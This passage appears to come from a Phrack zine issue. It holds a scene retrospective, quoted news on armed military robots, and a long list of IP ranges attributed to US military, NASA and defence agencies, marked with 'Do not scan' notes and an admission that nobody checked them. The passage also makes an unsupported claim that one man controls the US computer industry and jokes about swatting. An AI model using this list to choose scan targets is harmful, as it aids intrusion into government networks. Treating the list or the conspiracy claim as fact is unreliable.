+WWASPS institutions. These methods are said to be controversial, as there
+have been allegations of severe (sexual) abuse and torture by staff.
+In 2004, during a testimony, Ken Kay stated that in his opinion, sexual
+activity between staff members and students is "not necessarily abuse".
+How do you explain that Ken Kay is controlling the whole US computer
+industry, as well as the US education, and able to manage a galaxy of
+establishments doing sexual abuses in its total acceptation?  (See also
+http://antiwwasp.com/)
+
+
+
+--[ 3. Retrospective of The Underground scene ]--
+                 by Duvel
+
+Almost one year after the release of "A brief History of the Underground
+Scene", it's now time to give some feedback. First of all, The Phrack
+Staff and I would like to thank you all for your positive and negative 
+comments about this article. The goal of this article was not to 
+explain what the scene once was or what should be but more to provoke 
+the debate. And on this point the article was a success. Now it's time 
+to act.
+
+About the negative comments that I had, I won't reply to each of one.
+As you have probably seen, I didn't reply to any negative or positive
+comments (except one at the beginning...my bad) I prefer let people
+talk. But I was quite amused to see negative comments which for the
+majority were on some insignificant points (speech recognition is not 
+datamining, this guy doesn't know subnets, underground pyramid is for 
+Holywood magazine or hacking tricks are too lame). It would be stupid 
+to reply to them. So I won't.
+
+One of the thing that I am the most happy about is that a lot of young
+generations of hackers have found this article interesting and found their
+way through it. As you have probably seen, there is another article about
+the Underground scene in this issue. Anonymous' opinion is opposite
+to mine but if you read beetween the lines, we both go to the same 
+direction.
+
+Of course it's important to understand the history of hacking (what
+I tried to explain in my article) or how the underground died (what 
+Anonymous tries to explain in his article) but it's more important 
+to keep hackers alive. Even if the Underground won't ever be the same, 
+the passion is still there. It's this passion of hacking that should 
+stay alive.
+
+I really hope that all people who gave constructive comments can
+participate to the new Underground. A lot of people talk but don't do 
+anything. I've seen lots of interesting comment from people who want to 
+do something but at this stage we haven't seen anything from them. Are 
+these people too busy? Are these people just dreamers? Are these people 
+lacking required knowledge? Are these people....? I don't know.
+
+But this message is for these people: please stop talking but try to bring
+something to new generation of hackers.
+
+They need you.
+
+--[ 4. Killer robots ]--
+
+My roomba can get lost under the dining room table, bumping off 
+the chair legs, over and over. There are many routes of escape, 
+but it rarely finds one. Only a true genius could turn this 
+remarkable example of AI into a killing machine.
+
+
+http://blog.wired.com/defense/2007/10/roomba-maker-un.html 
+-------------------------------------------------------------------- 
+The makers of the cuter-than-cute robotic vacuum cleaner are 
+rolling out a new machine: A big, fast-moving, semi-autonomous 
+'bot capable of killing a whole bunch of people at once.
+
+Unlike other armed robots -- which are entirely remote-controlled 
+-- the Warriors are "being engineered with advanced software, 
+giving them the ability to perform some battlefield functions 
+autonomously."
+
+At the same time, a key dimension to the Warrior X700 is its 
+ability to protect soldiers by firing weapons such as a machine 
+gun or 40mm explosive round. 
+--------------------------------------------------------------------
+
+
+Bring in the big guns.
+
+
+http://blog.wired.com/defense/2007/10/robot-cannon-ki.html
+-------------------------------------------------------------------- 
+We're not used to thinking of them this way.  But many advanced
+military weapons are essentially robotic -- picking targets out
+automatically, slewing into position, and waiting only for a
+human to pull the trigger.  Most of the time.  Once in a while,
+though, these machines start firing mysteriously on their own.
+
+During the shooting trials at Armscor's Alkantpan shooting range,
+"I personally saw a gun go out of control several times," Young
+says. "They made a temporary rig consisting of two steel poles on
+each side of the weapon, with a rope in between to keep the
+weapon from swinging. The weapon eventually knocked the pol[e]s
+down."
+
+Mangope told The Star that it "is assumed that there was a
+mechanical problem, which led to the accident. The gun, which was
+fully loaded, did not fire as it normally should have," he said.
+"It appears as though the gun, which is computerised, jammed
+before there was some sort of explosion, and then it opened fire
+uncontrollably, killing and injuring the soldiers."
+
+    But the brave, as yet unnamed officer was unable to stop the
+wildly swinging computerised Swiss/German Oerlikon 35mm MK5
+anti-aircraft twin-barrelled gun. It sprayed hundreds of
+high-explosive 0.5kg 35mm cannon shells around the five-gun
+firing position.
+
+    By the time the gun had emptied its twin 250-round
+auto-loader magazines, nine soldiers were dead and 11 injured.
+--------------------------------------------------------------------
+
+
+Can I play too?
+
+
+http://blog.wired.com/defense/2007/12/new-killer-bot.html
+--------------------------------------------------------------------
+The stars: "a 25-year-old self-taught engineer named Adam 
+Gettings"  and his "toy-like but gun-wielding robot designed to 
+replace human soldiers on the battlefield."
+
+Gettings' company doesn't have much of an online signature -- not 
+even a website.  But he does have some interesting partners, 
+including former Disney imagineer Terry Izumi (who cooked up this 
+video for the 'bot) and shotgun maker Jerry Barber (who provided 
+the firepower).  Blackwater has also endorsed the product, 
+allegedly. 
+--------------------------------------------------------------------
+
+
+Blackwater and Disney? Who could ask for better qualifications? 
+Oh, and there's this cool marketing video.
+
+
+http://money.cnn.com/video/ft/#/video/fortune/2007/12/04/robotex.fortune
+
+
+Robot wars, anyone?
+
+
+http://blog.wired.com/defense/2007/05/top_war_tech_5_.html
+--------------------------------------------------------------------
+
+"The Baghdad bomb squad used their iRobots to decorate their 
+shop," Noah reported after an embed with an Army 
+ordnance-disposal unit a couple years back. "Not far away, at the 
+U.S. military's central robot depot for Iraq, the iRobots sat on 
+shelves, serenely gathering dust, while Foster-Miller's Talon 
+robots would come back, scarred and in pieces, after being chewed 
+up by a bomb."
+
+The company noted that war zone "Robot Hospitals" are repairing 
+more than 400 bomb-damaged robots a week to put them back into 
+service.
+--------------------------------------------------------------------
+
+
+My bot can kick your bot's ass. Great. But how do they stand up 
+against humans?
+
+Not the kind of humans that throw rocks at tanks, but the 
+thinking kind, like the ones that broke Israeli comms crypto 
+during the recent war in Lebanon.
+
+Let's see what happens when it comes across a carpet stretched 
+over a pit. Or somebody throws a blanket over it, or spray paints 
+the camera lens, or fires IR lasers or very bright oLEDS at the 
+camera.
+
+Once you have physical access to the thing, you own it. How hard 
+would it be to re-chip the thing and send it back against its 
+makers?
+
+Can we test our killer-robot counter measures? Maybe. The 
+opportunity may soon be as close as your local pigsty.
+
+
+http://blog.wired.com/defense/2007/08/armed-robots-so.html 
+-------------------------------------------------------------------- 
+Armed robots -- similar to the ones now on patrol in Iraq -- are 
+being marketed to domestic police forces, according to the 
+machines' manufacturer and law enforcement officers.
+
+Foster-Miller, maker of the armed SWORDS robot for military use, 
+is also actively promoting a similar model to domestic, civilian 
+police forces.  The Talon SWAT/MP is a "robot specifically 
+equipped for scenarios frequently encountered by police SWAT 
+[special weapon and tactics] units and MPs [military police]," a 
+company fact sheet announces.  It "can be configured with the 
+following equipment:
+
+ . Multi-shot TASER electronic control device with laser-dot 
+aiming.
+. Loudspeaker and audio receiver for negotiations.
+. Night vision and thermal cameras.
+. Choice of weapons for lethal or less-than-lethal responses
+  - 40 mm grenade launcher - 2 rounds
+  - 12-gage shotgun - 5 rounds
+  - FN303 less-lethal launcher - 15 rounds.
+
+In addition to the Massachusetts State Police,  SWAT teams in 
+Houston, San Francisco, and Lubbock, TX all have the robots, 
+according to Foster-Miller spokesperson Cynthia Black. 
+--------------------------------------------------------------------
+
+
+Finally, a legitimate excuse for Swatting.
+
+
+http://en.wikipedia.org/wiki/Swatting
+--------------------------------------------------------------------
+In the field of Information Security, Swatting is an attempt to 
+trick an emergency service to dispatch an emergency response 
+team. The name derives from attempts to trick an emergency 
+services operator (a "911 operator") into dispatching a SWAT 
+(Special Weapons and Training) team to a location under false 
+pretense.
+--------------------------------------------------------------------
+
+
+What next?
+
+
+http://blog.wired.com/defense/2007/11/black-knight.html
+--------------------------------------------------------------------
+We now know that there are robotic cars smart enough to drive 
+themselves around a city.  The next step: give those vehicles 
+automatic weapons, of course. 
+
+Or the troops can stay just chill out, and let the thing drive 
+itself.  The Knight uses "advanced robotic technology for 
+autonomous mobility," according to BAE.  "This capability allows 
+the Black Knight to plan routes, maneuver on the planned route, 
+and avoid obstacles - all without operator intervention."
+--------------------------------------------------------------------
+
+
+http://blog.wired.com/defense/2008/01/israel-thinking.html
+--------------------------------------------------------------------
+So Israeli military leaders have begun early planning for a new, 
+robotic defense system, armed with enough artificial intelligence 
+that it "could take over completely" from flesh-and-blood 
+operators.  "It will be designed for... autonomous operations,' 
+Brig. Gen. Daniel Milo, commander of Israel's air defense forces, 
+tells Defense News' Barbara Opall-Rome.  And in the event of a 
+"doomsday" strike, Opall-Rome notes, the system could handle 
+"attacks that exceed physiological limits of human command."
+
+How do you say "Skynet" in Hebrew, again?    
+--------------------------------------------------------------------
+
+
+http://www.reuters.com/article/oddlyEnoughNews/idUST27506220080408?feedType=RSS&feedName=oddlyEnoughNews&rpc=22&sp=true
+--------------------------------------------------------------------
+Robots could fill the jobs of 3.5 million people in graying Japan 
+by 2025, a thinktank says, helping to avert worker shortages as 
+the country's population shrinks.
+
+Caregivers would save more than an hour a day if robots helped 
+look after children, older people and did some housework, it 
+added. Robotic duties could include reading books out loud or 
+helping bathe the elderly.
+--------------------------------------------------------------------
+
+
+Don't drop the soap.
+
+
+--[ 5. Meaningful IP addresses ]--
+
+Here are some IP addresses that people send us...we haven't tried anything
+so don't blame us. If you have more ranges feel free to share.
+
+But before, the best IP list is probably the one on cryptome:
+
+http://cryptome.org/nsa-ip-update14.htm
+
+
+-----
+
+RANGE 6
+6.* - Army Information Systems Center
+
+RANGE 7
+7.*.*.* Defense Information Systems Agency, VA
+
+RANGE 11
+11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency,
+Washington DC
+
+RANGE 21
+21. - US Defense Information Systems Agency
+
+RANGE 22
+22.* - Defense Information Systems Agency
+
+RANGE 24
+24.198.*.*
+
+RANGE 25
+25.*.*.* Royal Signals and Radar Establishment, UK
+
+RANGE 26
+26.* - Defense Information Systems Agency
+
+RANGE 29
+29.* - Defense Information Systems Agency
+
+RANGE 30
+30.* - Defense Information Systems Agency
+
+RANGE 49
+49.* - Joint Tactical Command
+
+RANGE 50
+50.* - Joint Tactical Command
+
+RANGE 55
+55.* - Army National Guard Bureau
+
+RANGE 55
+55.* - Army National Guard Bureau
+
+RANGE 62
+62.0.0.1 - 62.30.255.255 Do not scan!
+
+RANGE 64
+64.70.*.* Do not scan
+64.224.* Do not Scan
+64.225.* Do not scan
+64.226.* Do not scan
+
+RANGE 128
+128.37.0.0 Army Yuma Proving Ground
+128.38.0.0 Naval Surface Warfare Center
+128.43.0.0 Defence Research Establishment-Ottawa
+128.47.0.0 Army Communications Electronics Command
+128.49.0.0 Naval Ocean Systems Center
+128.50.0.0 Department of Defense
+128.51.0.0 Department of Defense
+128.56.0.0 U.S. Naval Academy
+128.60.0.0 Naval Research Laboratory
+128.63.0.0 Army Ballistics Research Laboratory
+128.80.0.0 Army Communications Electronics Command
+128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
+128.102.0.0 NASA Ames Research Center
+128.149.0.0 NASA Headquarters
+128.154.0.0 NASA Wallops Flight Facility
+128.155.0.0 NASA Langley Research Center
+128.156.0.0 NASA Lewis Network Control Center
+128.157.0.0 NASA Johnson Space Center
+128.158.0.0 NASA Ames Research Center
+128.159.0.0 NASA Ames Research Center
+128.160.0.0 Naval Research Laboratory
+128.161.0.0 NASA Ames Research Center
+128.183.0.0 NASA Goddard Space Flight Center
+128.190.0.0 Army Belvoir Reasearch and Development Center
+128.202.0.0 50th Space Wing
+128.216.0.0 MacDill Air Force Base
+128.217.0.0 NASA Kennedy Space Center
+128.236.0.0 U.S. Air Force Academy
+
+RANGE 129
+129.23.0.0 Strategic Defense Initiative Organization
+129.29.0.0 United States Military Academy
+129.50.0.0 NASA Marshall Space Flight Center
+129.51.0.0 Patrick Air Force Base
+129.52.0.0 Wright-Patterson Air Force Base
+129.53.0.0 - 129.53.255.255 66SPTG-SCB
+129.54.0.0 Vandenberg Air Force Base, CA
+129.92.0.0 Air Force Institute of Technology
+129.99.0.0 NASA Ames Research Center
+129.131.0.0 Naval Weapons Center
+129.139.0.0 Army Armament Research Development and Engineering Center
+129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
+129.163.0.0 NASA/Johnson Space Center
+129.164.0.0 NASA IVV
+129.165.0.0 NASA Goddard Space Flight Center
+129.166.0.0 NASA - John F. Kennedy Space Center
+129.167.0.0 NASA Marshall Space Flight Center
+129.168.0.0 NASA Lewis Research Center
+129.190.0.0 Naval Underwater Systems Center
+129.198.0.0 Air Force Flight Test Center
+129.209.0.0 Army Ballistics Research Laboratory
+129.229.0.0 U.S. Army Corps of Engineers
+129.251.0.0 United States Air Force Academy
+
+RANGE 130
+130.40.0.0 NASA Johnson Space Center
+130.90.0.0 Mather Air Force Base
+130.109.0.0 Naval Coastal Systems Center
+130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
+130.124.0.0 Honeywell Defense Systems Group
+130.165.0.0 U.S.Army Corps of Engineers
+130.167.0.0 NASA Headquarters
+
+RANGE 131
+131.3.0.0 - 131.3.255.255 Mather Air Force Base
+131.6.0.0 Langley Air Force Base
+131.10.0.0 Barksdale Air Force Base
+131.17.0.0 Sheppard Air Force Base
+131.21.0.0 Hahn Air Base
+131.22.0.0 Keesler Air Force Base
+131.24.0.0 6 Communications Squadron
+131.25.0.0 Patrick Air Force Base
+131.27.0.0 75 ABW
+131.30.0.0 62 CS/SCSNT
+131.32.0.0 37 Communications Squadron
+131.35.0.0 Fairchild Air Force Base
+131.36.0.0 Yokota Air Base
+131.37.0.0 Elmendorf Air Force Base
+131.38.0.0 Hickam Air Force Base
+131.39.0.0 354CS/SCSN
+131.40.0.0 Bergstrom Air Force Base
+131.44.0.0 Randolph Air Force Base
+131.46.0.0 20 Communications Squadron
+131.47.0.0 Andersen Air Force Base
+131.50.0.0 Davis-Monthan Air Force Base
+131.52.0.0 56 Communications Squadron /SCBB
+131.54.0.0 Air Force Concentrator Network
+131.56.0.0 Upper Heyford Air Force Base
+131.58.0.0 Alconbury Royal Air Force Base
+131.59.0.0 7 Communications Squadron
+131.61.0.0 McConnell Air Force Base
+131.62.0.0 Norton Air Force Base
+131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
+131.74.0.0 Defense MegaCenter Columbus
+131.84.0.0 Defense Technical Information Center
+131.92.0.0 Army Information Systems Command - Aberdeen (EA)
+131.105.0.0 McClellan Air Force Base
+131.110.0.0 NASA/Michoud Assembly Facility
+131.120.0.0 Naval Postgraduate School
+131.121.0.0 United States Naval Academy
+131.122.0.0 United States Naval Academy
+131.176.0.0 European Space Operations Center
+131.182.0.0 NASA Headquarters
+131.250.0.0 Office of the Chief of Naval Research
+
+RANGE 132
+132.3.0.0 Williams Air Force Base
+132.5.0.0 - 132.5.255.255 49th Fighter Wing
+132.6.0.0 Ankara Air Station
+132.7.0.0 - 132.7.255.255 SSG/SINO
+132.9.0.0 28th Bomb Wing
+132.10.0.0 319 Comm Sq
+132.11.0.0 Hellenikon Air Base
+132.12.0.0 Myrtle Beach Air Force Base
+132.13.0.0 Bentwaters Royal Air Force Base
+132.14.0.0 Air Force Concentrator Network
+132.15.0.0 Kadena Air Base
+132.16.0.0 Kunsan Air Base
+132.17.0.0 Lindsey Air Station
+132.18.0.0 McGuire Air Force Base
+132.19.0.0 100CS (NET-MILDENHALL)
+132.20.0.0 35th Communications Squadron
+132.21.0.0 Plattsburgh Air Force Base
+132.22.0.0 23Communications Sq
+132.24.0.0 Dover Air Force Base
+132.25.0.0 786 CS/SCBM
+132.27.0.0 - 132.27.255.255 39CS/SCBBN
+132.28.0.0 14TH COMMUNICATION SQUADRON
+132.30.0.0 Lajes Air Force Base
+132.31.0.0 Loring Air Force Base
+132.33.0.0 60CS/SCSNM
+132.34.0.0 Cannon Air Force Base
+132.35.0.0 Altus Air Force Base
+132.37.0.0 75 ABW
+132.38.0.0 Goodfellow AFB
+132.39.0.0 K.I. Sawyer Air Force Base
+132.40.0.0 347 COMMUNICATION SQUADRON
+132.42.0.0 Spangdahlem Air Force Base
+132.43.0.0 Zweibruchen Air Force Base
+132.45.0.0 Chanute Air Force Base
+132.46.0.0 Columbus Air Force Base
+132.48.0.0 Laughlin Air Force Base
+132.49.0.0 366CS/SCSN
+132.50.0.0 Reese Air Force Base
+132.52.0.0 Vance Air Force Base
+132.54.0.0 Langley AFB
+132.55.0.0 Torrejon Air Force Base
+132.56.0.0 - 132.56.255.255 9 CS/SC
+132.57.0.0 Castle Air Force Base
+132.58.0.0 Nellis Air Force Base
+132.59.0.0 24Comm Squadron\SCSNA
+132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
+132.61.0.0 SSG/SIN
+132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
+132.79.0.0 Army National Guard Bureau
+132.80.0.0 - 132.80.255.255 NGB-AIS-OS
+132.80.0.0 - 132.85.255.255 National Guard Bureau
+132.82.0.0 Army National Guard Bureau
+132.86.0.0 National Guard Bureau
+132.87.0.0 - 132.93.255.255 National Guard Bureau
+132.94.0.0 Army National Guard Bureau
+132.95.0.0 - 132.103.255.255 National Guard Bureau
+132.95.0.0 - 132.108.0.0 DOD Network Information Center
+132.104.0.0 - 132.104.255.255 Army National Guard Bureau
+132.105.0.0 - 132.108.255.255 Army National Guard Bureau
+132.109.0.0 National Guard Bureau
+132.110.0.0 - 132.116.255.255 Army National Guard Bureau
+132.114.0.0 Army National Guard
+132.117.0.0 Army National Guard Bureau
+132.118.0.0 - 132.132.0.0 Army National Guard Bureau
+132.122.0.0 South Carolina Army National Guard, USPFO
+132.133.0.0 National Guard Bureau
+132.134.0.0 - 132.143.255.255 National Guard Bureau
+132.159.0.0 Army Information Systems Command
+132.193.0.0 Army Research Office
+132.250.0.0 Naval Research Laboratory
+
+RANGE 134
+134.5.0.0 Lockheed Aeronautical Systems Company
+134.11.0.0 The Pentagon
+134.12.0.0 NASA Ames Research Center
+134.51.0.0 Boeing Military Aircraft Facility
+134.52.*.* Boeing Corporation
+134.78.0.0 Army Information Systems Command-ATCOM
+134.80.0.0 Army Information Systems Command
+134.118.0.0 NASA/Johnson Space Center
+134.131.0.0 Wright-Patterson Air Force Base
+134.136.0.0 Wright-Patterson Air Force Base
+134.164.0.0 Army Engineer Waterways Experiment Station
+134.165.0.0 Headquarters Air Force Space Command
+134.194.0.0 U.S. Army Aberdeen Test Center
+134.205.0.0 7th Communications Group
+134.207.0.0 Naval Research Laboratory
+134.229.0.0 Navy Regional Data Automation Center
+134.230.0.0 Navy Regional Data Automation Center
+134.232.0.0 - 134.232.255.255 U.S. Army, Europe
+134.233.0.0 HQ 5th Signal Command
+134.234.0.0 - 134.234.255.255 Southern European Task Force
+134.235.0.0 HQ 5th Signal Command
+134.240.0.0 U.S. Military Academy
+136.149.0.0 Air Force Military Personnel Center
+
+RANGE 136
+136.178.0.0 NASA Research Network
+136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
+136.207.0.0 69th Signal Battalion
+136.208.0.0 HQ, 5th Signal Command
+136.209.0.0 HQ 5th Signal Command
+136.210.0.0 HQ 5th Signal Command
+136.212.0.0 HQ 5th Signal Command
+136.213.0.0 HQ, 5th Signal Command
+136.214.0.0 HQ, 5th Signal Command
+136.215.0.0 HQ, 5th Signal Command
+136.216.0.0 HQ, 5th Signal Command
+136.217.0.0 HQ, 5th Signal Command
+136.218.0.0 HQ, 5th Signal Command
+136.219.0.0 HQ, 5th Signal Command
+136.220.0.0 HQ, 5th Signal Command
+136.221.0.0 HQ, 5th Signal Command
+136.222.0.0 HQ, 5th Signal Command
+
+
+RANGE 137
+137.1.0.0 Whiteman Air Force Base
+137.2.0.0 George Air Force Base
+137.3.0.0 Little Rock Air Force Base
+137.4.0.0 - 137.4.255.255 437 CS/SC
+137.5.0.0 Air Force Concentrator Network
+137.6.0.0 Air Force Concentrator Network
+137.11.0.0 HQ AFSPC/SCNNC
+137.12.0.0 Air Force Concentrator Network
+137.17.* National Aerospace Laboratory
+137.24.0.0 Naval Surface Warfare Center
+137.29.0.0 First Special Operations Command
+137.67.0.0 Naval Warfare Assessment Center
+137.94.* Royal Military College
+137.95.* Headquarters, U.S. European Command
+137.126.0.0 USAF MARS
+137.127.* Army Concepts Analysis Agency
+137.128.* U.S. ARMY Tank-Automotive Command
+137.130.0.0 Defense Information Systems Agency
+137.209.0.0 Defense Information Systems Agency
+137.210.0.0 Defense Information Systems Agency
+137.211.0.0 Defense Information Systems Agency
+137.212.0.0 Defense Information Systems Agency
+137.231.0.0 HQ 5th Signal Command
+137.232.0.0 Defense Information Systems Agency
+137.233.0.0 Defense Information Systems Agency
+137.234.0.0 Defense Information Systems Agency
+137.235.0.0 Defense Information Systems Agency
+137.240.0.0 Air Force Materiel Command
+137.241.0.0 75 ABW
+137.242.0.0 Air Force Logistics Command
+137.243.0.0 77 CS/SCCN
+137.244.0.0 78 CS/SCSC
+137.245.0.0 Wright Patterson Air Force Base
+137.246.0.0 United States Atlantic Command Joint Training
+
+RANGE 138
+138.13.0.0 Air Force Systems Command
+138.27.0.0 Army Information Systems Command
+138.50.0.0 HQ 5th Signal Command
+138.65.0.0 HQ, 5th Signal Command
+138.76.0.0 NASA Headquarters
+138.109.0.0 Naval Surface Warfare Center
+138.115.0.0 NASA Information and Electronic Systems Laboratory
+138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
+138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications
+Station
+138.137.0.0 Navy Regional Data Automation Center (NARDAC)
+138.139.0.0 Marine Corps Air Station
+138.140.0.0 Navy Regional Data Automation Center
+138.141.0.0 Navy Regional Data Automation Center
+138.142.0.0 Navy Regional Data Automation Center
+138.143.0.0 Navy Regional Data Automation Center
+138.144.0.0 NAVCOMTELCOM
+138.145.0.0 NCTS WASHINGTON
+138.146.0.0 NCTC
+138.147.0.0 NCTC
+138.148.0.0 NCTC
+138.149.0.0 NCTC
+138.150.0.0 NCTC
+138.151.0.0 NCTC
+138.152.0.0 NCTC
+138.153.0.0 Yokosuka Naval Base
+138.154.0.0 NCTC
+138.155.0.0 NCTC
+138.156.0.0 Marine Corps Central Design & Prog. Activity
+138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog.
+Activity
+138.158.0.0 Marine Corps Central Design & Prog. Activity
+138.159.0.0 NCTC
+138.160.0.0 Naval Air Station
+138.161.0.0 NCTC
+138.162.0.0 NCTC
+138.163.0.0 NCTC
+138.164.0.0 NCTC
+138.165.0.0 NCTC
+138.166.0.0 NCTC
+138.167.0.0 NOC, MCTSSA, East
+138.168.0.0 Marine Corps Central Design & Prog. Activity
+138.169.0.0 NAVAL COMPUTER AND TELECOMM
+138.169.12.0 NAVAL COMPUTER AND TELECOMM
+138.169.13.0 NAVAL COMPUTER AND TELECOMM
+138.170.0.0 NCTC
+138.171.0.0 NCTC
+138.172.0.0 NCTC
+138.173.0.0 NCTC
+138.174.0.0 NCTC
+138.175.0.0 NCTC
+138.176.0.0 NCTC
+138.177.0.0 NCTS Pensacola
+138.178.0.0 NCTC
+138.179.0.0 NCTC
+138.180.0.0 NCTC
+138.181.0.0 NCTC
+138.182.0.0 CNO N60
+138.183.0.0 NCTC
+138.184.0.0 NCTS
+138.193.0.0 NASA/Yellow Creek
+
+RANGE 139
+139.31.0.0 20th Tactical Fighter Wing
+139.32.0.0 48th Tactical Fighter Wing
+139.33.0.0 36th Tactical Fighter Wing
+139.34.0.0 52nd Tactical Fighter Wing
+139.35.0.0 50th Tactical Fighter Wing
+139.36.0.0 66th Electronic Combat Wing
+139.37.0.0 26th Tactical Reconnaissance Wing
+139.38.0.0 32nd Tactical Fighter Squadron
+139.39.0.0 81st Tactical Fighter Wing
+139.40.0.0 10th Tactical Fighter Wing
+139.41.0.0 39th Tactical Air Control Group
+139.42.0.0 40th Tactical Air Control Group
+139.43.0.0 401st Tactical Fighter Wing
+139.124.* Reseau Infomratique
+139.142.*.*
+
+RANGE 140
+140.1.0.0 Defense Information Systems Agency
+140.3.0.0 Defense Information Systems Agency
+140.4.0.0 Defense Information Systems Agency
+140.5.0.0 Defense Information Systems Agency
+140.6.0.0 Defense Information Systems Agency
+140.7.0.0 Defense Information Systems Agency
+140.8.0.0 Defense Information Systems Agency
+140.9.0.0 Defense Information Systems Agency
+140.10.0.0 Defense Information Systems Agency
+140.11.0.0 Defense Information Systems Agency
+140.12.0.0 Defense Information Systems Agency
+140.13.0.0 Defense Information Systems Agency
+140.14.0.0 DISA Columbus Level II NOC
+140.15.0.0 Defense Information Systems Agency
+140.16.0.0 Defense Information Systems Agency
+140.17.0.0 Defense Information Systems Agency
+140.18.0.0 Defense Information Systems Agency
+140.19.0.0 Defense Information Systems Agency
+140.20.0.0 Defense Information Systems Agency
+140.21.0.0 Defense Information Systems Agency
+140.22.0.0 Defense Information Systems Agency
+140.23.0.0 Defense Information Systems Agency
+140.24.0.0 ASIC ALLIANCE-MARLBORO
+140.25.0.0 Defense Information Systems Agency
+140.26.0.0 Defense Information Systems Agency
+140.27.0.0 Defense Information Systems Agency
+140.28.0.0 Defense Information Systems Agency
+140.29.0.0 Defense Information Systems Agency
+140.30.0.0 Defense Information Systems Agency
+140.31.0.0 Defense Information Systems Agency
+140.32.0.0 Defense Information Systems Agency
+140.33.0.0 Defense Information Systems Agency
+140.34.0.0 Defense Information Systems Agency
+140.35.0.0 Defense Information Systems Agency
+140.36.0.0 Defense Information Systems Agency
+140.37.0.0 Defense Information Systems Agency
+140.38.0.0 Defense Information Systems Agency
+140.39.0.0 Defense Information Systems Agency
+140.40.0.0 Defense Information Systems Agency
+140.41.0.0 Defense Information Systems Agency
+140.42.0.0 Defense Information Systems Agency
+140.43.0.0 Defense Information Systems Agency
+140.44.0.0 Defense Information Systems Agency
+140.45.0.0 Defense Information Systems Agency
+140.46.0.0 Defense Information Systems Agency
+140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
+140.47.0.0 - 140.48.255.255 DOD Network Information Center
+140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
+140.49.0.0 Defense Information Systems Agency
+140.50.0.0 Defense Information Systems Agency
+140.51.0.0 Defense Information Systems Agency
+140.52.0.0 Defense Information Systems Agency
+140.53.0.0 Defense Information Systems Agency
+140.54.0.0 Defense Information Systems Agency
+140.55.0.0 Defense Information Systems Agency
+140.56.0.0 Defense Information Systems Agency
+140.57.0.0 Defense Information Systems Agency
+140.58.0.0 Defense Information Systems Agency
+140.59.0.0 Defense Information Systems Agency
+140.60.0.0 Defense Information Systems Agency
+140.61.0.0 Defense Information Systems Agency
+140.62.0.0 Defense Information Systems Agency
+140.63.0.0 Defense Information Systems Agency
+140.64.0.0 Defense Information Systems Agency
+140.65.0.0 Defense Information Systems Agency
+140.66.0.0 Defense Information Systems Agency
+140.67.0.0 Defense Information Systems Agency
+140.68.0.0 Defense Information Systems Agency
+140.69.0.0 Defense Information Systems Agency
+140.70.0.0 Defense Information Systems Agency
+140.71.0.0 Defense Information Systems Agency
+140.72.0.0 Defense Information Systems Agency
+140.73.0.0 Defense Information Systems Agency
+140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
+140.100.0.0 Naval Sea Systems Command
+140.139.0.0 HQ US Army Medical Research and Development Command
+140.154.0.0 HQ 5th Signal Command
+140.155.0.0 HQ, 5th Signal Command
+140.156.0.0 HQ, 5th Signal Command
+140.175.0.0 Scott Air Force Base
+140.178.0.0 Naval Undersea Warfare Center Division, Keyport
+140.187.0.0 Fort Bragg
+140.194.0.0 US Army Corps of Engineers
+140.195.0.0 Naval Sea Systems Command
+140.199.0.0 Naval Ocean Systems Center
+140.201.0.0 HQ, 5th Signal Command
+140.202.0.0 106TH SIGNAL BRIGADE
+
+RANGE 143
+143.45.0.0 58th Signal Battalion
+143.46.0.0 U.S. Army, 1141st Signal Battalion
+143.68.0.0 Headquarters, USAISC
+143.69.0.0 Headquarters, USAAISC
+143.70.0.0 Headquarters, USAAISC
+143.71.0.0 Headquarters, USAAISC
+143.72.0.0 Headquarters, USAAISC
+143.73.0.0 Headquarters, USAAISC
+143.74.0.0 Headquarters, USAAISC
+143.75.0.0 Headquarters, USAAISC
+143.76.0.0 Headquarters, USAAISC
+143.77.0.0 Headquarters, USAAISC
+143.78.0.0 Headquarters, USAAISC
+143.79.0.0 Headquarters, USAAISC
+143.80.0.0 Headquarters, USAAISC
+143.81.0.0 Headquarters, USAAISC
+143.82.0.0 Headquarters, USAAISC
+143.84.0.0 Headquarters, USAAISC
+143.85.0.0 Headquarters, USAAISC
+143.86.0.0 Headquarters, USAAISC
+143.87.0.0 Headquarters, USAAISC
+143.232.0.0 NASA Ames Research Center
+
+RANGE 144
+144.99.0.0 United States Army Information Systems Command
+144.109.0.0 Army Information Systems Command
+144.143.0.0 Headquarters, Third United States Army
+144.144.0.0 Headquarters, Third United States Army
+144.146.0.0 Commander, Army Information Systems Center
+144.147.0.0 Commander, Army Information Systems Center
+144.170.0.0 HQ, 5th Signal Command
+144.192.0.0 United States Army Information Services Command-Campbell
+144.233.0.0 Defense Intelligence Agency
+144.234.0.0 Defense Intelligence Agency
+144.235.0.0 Defense Intelligence Agency
+144.236.0.0 Defense Intelligence Agency
+144.237.0.0 Defense Intelligence Agency
+144.238.0.0 Defense Intelligence Agency
+144.239.0.0 Defense Intelligence Agency
+144.240.0.0 Defense Intelligence Agency
+144.241.0.0 Defense Intelligence Agency
+144.242.0.0 Defense Intelligence Agency
+144.252.0.0 U.S. Army LABCOM
+
+RANGE 146
+146.17.0.0 HQ, 5th Signal Command
+146.80.0.0 Defence Research Agency
+146.98.0.0 HQ United States European Command
+146.154.0.0 NASA/Johnson Space Center
+146.165.0.0 NASA Langley Research Center
+
+RANGE 147
+147.35.0.0 HQ, 5th Signal Command
+147.36.0.0 HQ, 5th Signal Command
+147.37.0.0 HQ, 5th Signal Command
+147.38.0.0 HQ, 5th Signal Command
+147.39.0.0 HQ, 5th Signal Command
+147.40.0.0 HQ, 5th Signal Command
+147.42.0.0 Army CALS Project
+147.103.0.0 Army Information Systems Software Center
+147.104.0.0 Army Information Systems Software Center
+147.159.0.0 Naval Air Warfare Center, Aircraft Division
+147.168.0.0 Naval Surface Warfare Center
